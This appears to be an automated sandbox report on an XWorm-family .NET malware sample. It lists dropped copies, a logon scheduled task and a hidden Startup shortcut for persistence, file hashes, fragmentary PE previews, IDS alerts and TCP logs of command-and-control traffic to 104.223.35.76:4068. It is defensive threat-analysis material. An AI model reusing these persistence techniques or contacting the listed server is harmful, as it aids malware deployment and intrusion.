                              C:\Users\user\AppData\Local\Temp\tmp960E.tmp

                              Download File
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1581
                              Entropy (8bit):5.1099289848386675
                              Encrypted:false
                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgergYrFdOFzOzN33ODOiDdKrsuTav
                              MD5:AF0C00DEA3136F47ECD0634C9538B4C4
                              SHA1:FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B
                              SHA-256:0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
                              SHA-512:7264BE5C87E4B721FB309B43F7D38F548976EFFF4E5B9B4B7A0174402AC18ADB635A17713A4D8F9A6D2694A1E5E4900EC42C81C19F249874A8706755B1C791AE
                              Malicious:true
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                              C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp

                              Download File
                              Process:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1581
                              Entropy (8bit):5.1099289848386675
                              Encrypted:false
                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgergYrFdOFzOzN33ODOiDdKrsuTav
                              MD5:AF0C00DEA3136F47ECD0634C9538B4C4
                              SHA1:FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B
                              SHA-256:0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
                              SHA-512:7264BE5C87E4B721FB309B43F7D38F548976EFFF4E5B9B4B7A0174402AC18ADB635A17713A4D8F9A6D2694A1E5E4900EC42C81C19F249874A8706755B1C791AE
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                              C:\Users\user\AppData\Local\Temp\tmpE6A.tmp

                              Download File
                              Process:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1581
                              Entropy (8bit):5.1099289848386675
                              Encrypted:false
                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgergYrFdOFzOzN33ODOiDdKrsuTav
                              MD5:AF0C00DEA3136F47ECD0634C9538B4C4
                              SHA1:FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B
                              SHA-256:0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
                              SHA-512:7264BE5C87E4B721FB309B43F7D38F548976EFFF4E5B9B4B7A0174402AC18ADB635A17713A4D8F9A6D2694A1E5E4900EC42C81C19F249874A8706755B1C791AE
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk

                              Download File
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Oct 31 08:31:24 2024, mtime=Thu Oct 31 08:31:25 2024, atime=Thu Oct 31 08:31:25 2024, length=575496, window=hide
                              Category:dropped
                              Size (bytes):882
                              Entropy (8bit):5.044289521357359
                              Encrypted:false
                              SSDEEP:12:8OG4ff88CGlsY//4LyQPplozK6LHAjAkeFHOpcc+LSS9pBmV:8QfE8hZi7Ppum/AkeTWqpBm
                              MD5:64D46B8CC371AF7F92D323E0A91119E4
                              SHA1:3338DB5C22FEBADCB4F2D32A1CE0E7CABCE3879F
                              SHA-256:C57727433577BC090FBFB8FCB2263768A27CE8784FE738BCB5164B2C411AA5D6
                              SHA-512:6E3FE19E62781D664124F32C6BD3104EA8906282557E70580F47B6B82C3F38E21BA0B694667CA52C9AA0457F88F484798101F6DFDDB72FC134E5B03663468E9A
                              Malicious:false
                              Preview:L..................F.... .....2.w+..-..w+..-..w+............................:..DG..Yr?.D..U..k0.&...&...... M......U..w+..bX.w+......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl_Y.K....B.....................Bdg.A.p.p.D.a.t.a...B.V.1....._Y.K..Roaming.@......DWSl_Y.K....C.........................R.o.a.m.i.n.g.......2....._Y.K .SSBOTT~1.EXE..v......_Y.K_Y.K........................... Z.S.S. .B.o.t.t.m.a.c. .E.n.g.i.n.e.e.r.s. .P.v.t... .L.t.d.....e.x.e.......q...............-.......p............r.......C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe..1.....\.....\.....\.....\.....\.S.S. .B.o.t.t.m.a.c. .E.n.g.i.n.e.e.r.s. .P.v.t... .L.t.d.....e.x.e.`.......X.......767668...........hT..CrF.f4... ..?9.j....,...W..hT..CrF.f4... ..?9.j....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                              C:\Users\user\AppData\Roaming\RTUZKYTc.exe

                              Download File
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):575496
                              Entropy (8bit):7.461418801045634
                              Encrypted:false
                              SSDEEP:12288:FDxrXQ9TZweejcQ1FXQEcupRk6CvPlZ0wJOszYkR:ZQejd1BpcupC6Cb0qL
                              MD5:FF9E45D7326698F34526793BF1244811
                              SHA1:B3FF69ABFE1C5E6633A866FFBEBE2139A69E3F0A
                              SHA-256:4DB566FCDC413FE50153DC8431AE86192241F0E1E86071F80D42EB6E0FB5BACA
                              SHA-512:ED2E02262BEB00F77C5D17854C7B6544CDB4EDCE37E870505E21C0CD08999CB99904A667E5ED31CDE3A3437C4E9713E6BFC63F091B30A9CEC25A046AD0120657
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 39%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0.............F.... ........@.. ....................................@....................................O........................6..........pp..T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................%.......H.......P...(.......Y...x\...............................................0..L.........}.....( ......(!.....(............s".....(#....o$.....(%....o&.....('....*.0............}........((........().....,5...(............s".....(.....o$.....(.....o&....85....r...p.o...(*...o+...to.......(,..........9.....s ........s-...s....o/......o#...r...po0..........,$..(#.....o#...r...po0...s....o1........o2...(3.......o4...(5.......o6...(7.......o8...(9.......o:...(;.......o<...(=.........

                              C:\Users\user\AppData\Roaming\RTUZKYTc.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe

                              Download File
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):575496
                              Entropy (8bit):7.461418801045634
                              Encrypted:false
                              SSDEEP:12288:FDxrXQ9TZweejcQ1FXQEcupRk6CvPlZ0wJOszYkR:ZQejd1BpcupC6Cb0qL
                              MD5:FF9E45D7326698F34526793BF1244811
                              SHA1:B3FF69ABFE1C5E6633A866FFBEBE2139A69E3F0A
                              SHA-256:4DB566FCDC413FE50153DC8431AE86192241F0E1E86071F80D42EB6E0FB5BACA
                              SHA-512:ED2E02262BEB00F77C5D17854C7B6544CDB4EDCE37E870505E21C0CD08999CB99904A667E5ED31CDE3A3437C4E9713E6BFC63F091B30A9CEC25A046AD0120657
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 39%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0.............F.... ........@.. ....................................@....................................O........................6..........pp..T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................%.......H.......P...(.......Y...x\...............................................0..L.........}.....( ......(!.....(............s".....(#....o$.....(%....o&.....('....*.0............}........((........().....,5...(............s".....(.....o$.....(.....o&....85....r...p.o...(*...o+...to.......(,..........9.....s ........s-...s....o/......o#...r...po0..........,$..(#.....o#...r...po0...s....o1........o2...(3.......o4...(5.......o6...(7.......o8...(9.......o:...(;.......o<...(=.........

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.461418801045634
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              • Win32 Executable (generic) a (10002005/4) 49.97%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:SS Bottmac Engineers Pvt. Ltd..exe
                              File size:575'496 bytes
                              MD5:ff9e45d7326698f34526793bf1244811
                              SHA1:b3ff69abfe1c5e6633a866ffbebe2139a69e3f0a
                              SHA256:4db566fcdc413fe50153dc8431ae86192241f0e1e86071f80d42eb6e0fb5baca
                              SHA512:ed2e02262beb00f77c5d17854c7b6544cdb4edce37e870505e21c0cd08999cb99904a667e5ed31cde3a3437c4e9713e6bfc63f091b30a9cec25a046ad0120657
                              SSDEEP:12288:FDxrXQ9TZweejcQ1FXQEcupRk6CvPlZ0wJOszYkR:ZQejd1BpcupC6Cb0qL
                              TLSH:2DC48BD03A7A7719DEB58AB49129DDB583F12968B010FAE61DDD3BC7359D300AE08F06
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0.............F.... ........@.. ....................................@................................

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x48a446
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x67231B06 [Thu Oct 31 05:52:06 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                              Signature Validation Error:The digital signature of the object did not verify
                              Error Number:-2146869232
                              Not Before, Not After
                              • 13/11/2018 01:00:00 09/11/2021 00:59:59
                              Subject Chain
                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                              Version:3
                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                              Serial:7C1118CBBADC95DA3752C46E47A27438

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              push ebx
                              add byte ptr [ecx+00h], bh
                              jnc 00007FA48D38A6C2h
                              je 00007FA48D38A6C2h
                              add byte ptr [ebp+00h], ch
                              add byte ptr [ecx+00h], al
                              arpl word ptr [eax], ax
                              je 00007FA48D38A6C2h
                              imul eax, dword ptr [eax], 00610076h
                              je 00007FA48D38A6C2h
                              outsd
                              add byte ptr [edx+00h], dh
                              add dword ptr [eax], eax
                              add byte ptr [eax], al
                              add al, byte ptr [eax]
                              add byte ptr [eax], al
                              add eax, dword ptr [eax]
                              add byte ptr [eax], al
                              add al, 00h
                              add byte ptr [eax], al
                              add eax, 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8a3f10x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x694.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x892000x3608
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x870700x54.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x884840x88600d35674f536bbe136f3752f27b7e9f34dFalse0.7844186812557287data7.459719521334949IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x8c0000x6940x80046f1e6b661619d9b18067bec3234c547False0.3662109375data3.630613286820944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x8e0000xc0x200883f6d6b8a419b887e602819eb31c4c5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x8c0900x404data0.4270428015564202
                              RT_MANIFEST0x8c4a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-31T10:32:39.990747+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.550014104.223.35.764068TCP
                              2024-10-31T10:34:03.831754+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.550035104.223.35.764068TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 31, 2024 10:31:30.302781105 CET497644068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:30.307766914 CET406849764104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:30.307876110 CET497644068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:30.423974991 CET497644068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:30.428909063 CET406849764104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:30.912976027 CET406849764104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:30.913130045 CET497644068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:34.362528086 CET497644068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:34.364705086 CET497894068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:34.367291927 CET406849764104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:34.369560003 CET406849789104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:34.369709015 CET497894068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:34.843142033 CET497894068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:34.848114014 CET406849789104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:34.958785057 CET406849789104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:34.958868980 CET497894068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:38.003479958 CET497894068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:38.004472971 CET498094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:38.008424997 CET406849789104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:38.009432077 CET406849809104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:38.009515047 CET498094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:38.019609928 CET498094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:38.025077105 CET406849809104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:38.592128992 CET406849809104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:38.592247009 CET498094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:41.927381039 CET498094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:41.929008007 CET498314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:41.932228088 CET406849809104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:41.933902979 CET406849831104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:41.934004068 CET498314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:41.945107937 CET498314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:41.949979067 CET406849831104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:42.528084040 CET406849831104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:42.529757023 CET498314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:45.582067013 CET498314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:45.583619118 CET498484068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:45.586910963 CET406849831104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:45.588481903 CET406849848104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:45.589274883 CET498484068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:45.695251942 CET498484068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:45.700078011 CET406849848104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:46.175339937 CET406849848104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:46.175535917 CET498484068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:49.206543922 CET498484068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:49.208218098 CET498704068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:49.211394072 CET406849848104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:49.213062048 CET406849870104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:49.213185072 CET498704068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:49.229417086 CET498704068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:49.234226942 CET406849870104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:49.804361105 CET406849870104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:49.804476976 CET498704068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.112865925 CET498704068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.114085913 CET498964068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.118088961 CET406849870104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:54.119124889 CET406849896104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:54.119244099 CET498964068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.138186932 CET498964068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.143094063 CET406849896104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:54.708005905 CET406849896104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:54.708093882 CET498964068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.722228050 CET498964068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.723329067 CET499024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.727175951 CET406849896104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:54.728257895 CET406849902104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:54.728337049 CET499024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.737328053 CET499024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:54.742156982 CET406849902104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:55.315321922 CET406849902104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:55.316575050 CET499024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:59.196410894 CET499024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:59.201267958 CET406849902104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:59.240833044 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:59.245920897 CET406849929104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:59.246006966 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:59.351717949 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:31:59.356585026 CET406849929104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:59.831048012 CET406849929104.223.35.76192.168.2.5
                              Oct 31, 2024 10:31:59.831181049 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:03.503720999 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:03.504893064 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:03.815814972 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.425259113 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.518970966 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.604948044 CET406849929104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.604971886 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.605081081 CET406849929104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.605232954 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.605233908 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.606174946 CET406849929104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.606213093 CET499294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.606381893 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:04.606417894 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.876774073 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:04.881680965 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:05.195539951 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:05.195648909 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.659670115 CET499504068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.661576986 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.667212963 CET406849950104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:08.667228937 CET406849971104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:08.667323112 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.679802895 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:08.684609890 CET406849971104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:09.429411888 CET406849971104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:09.429672956 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.519119024 CET499714068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.520442009 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.524116039 CET406849971104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:09.525511980 CET406849977104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:09.525599003 CET499774068192.168.2.5104.223.35.76
